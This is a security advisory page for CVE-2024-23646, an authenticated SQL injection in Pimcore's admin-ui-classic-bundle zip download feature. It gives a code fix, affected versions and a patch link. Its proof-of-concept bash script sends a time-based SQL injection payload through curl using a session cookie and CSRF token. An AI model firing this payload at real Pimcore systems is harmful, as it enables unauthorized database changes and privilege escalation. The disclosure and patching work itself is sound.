high
8.8
CWE
89 352
EPSS
0.059%
Advisory Published
Advisory Published
Updated

CVE-2024-23646: Pimcore Admin Classic Bundle SQL Injection in Admin download files as zip

First published: Wed Jan 24 2024(Updated: )

### Summary The application allows to create zip files from available files on the site. The parameter "selectedIds", is susceptible to SQL Injection. ### Details [downloadAsZipJobsAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006) escape parameters, but [downloadAsZipAddFilesAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087) not. The following code should be added: ``` foreach ($selectedIds as $selectedId) { if ($selectedId) { $quotedSelectedIds[] = $db->quote($selectedId); } } ``` ### PoC - Set up an example project as described on https://github.com/pimcore/demon (demo package with example content) - Log In. Grab the `X-pimcore-csrf-token` header from any request to the backend, as well as the `PHPSESSID` cookie. - Run the following script, substituting the values accordingly: ``` #!/bin/bash BASE_URL=http://localhost # REPLACE THIS! CSRF_TOKEN="5133f9d5d28de7dbab39e33ac7036271284ee42e" # REPLACE THIS! COOKIE="PHPSESSID=4312797207ba3b342b29218fa42f3aa3" # REPLACE THIS! SQL="(select*from(select(sleep(6)))a)" curl "${BASE_URL}/admin/asset/download-as-zip-add-files?_dc=1700573579093&id=1&selectedIds=1,${SQL}&offset=10&limit=5&jobId=655cb18a37b01" \ -X GET \ -H "X-pimcore-csrf-token: ${CSRF_TOKEN}" \ -H "Cookie: ${COOKIE}" ` ``` - The response is delayed by 6 seconds. ### Impact Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.

Credit: security-advisories@github.com security-advisories@github.com

Affected SoftwareAffected VersionHow to fix
composer/pimcore/admin-ui-classic-bundle>=1.0.0<1.3.2
1.3.2
Pimcore admin-ui-classic-bundle>=1.0.0<1.3.2

Remedy

https://github.com/pimcore/admin-ui-classic-bundle/commit/363afef29496cc40a8b863c2ca2338979fcf50a8

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

Reference Links

Frequently Asked Questions

  • What is the severity of CVE-2024-23646?

    CVE-2024-23646 has been classified with a severity level that indicates a critical vulnerability due to SQL Injection risks.

  • How do I fix CVE-2024-23646?

    To fix CVE-2024-23646, upgrade the pimcore/admin-ui-classic-bundle to version 1.3.2 or later.

  • What types of software are affected by CVE-2024-23646?

    CVE-2024-23646 affects versions of the pimcore/admin-ui-classic-bundle between 1.0.0 and 1.3.2.

  • What type of vulnerability is CVE-2024-23646?

    CVE-2024-23646 is classified as an SQL Injection vulnerability.

  • What actions can be taken to mitigate CVE-2024-23646?

    Mitigating actions for CVE-2024-23646 include sanitizing inputs and applying security patches as soon as available.

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203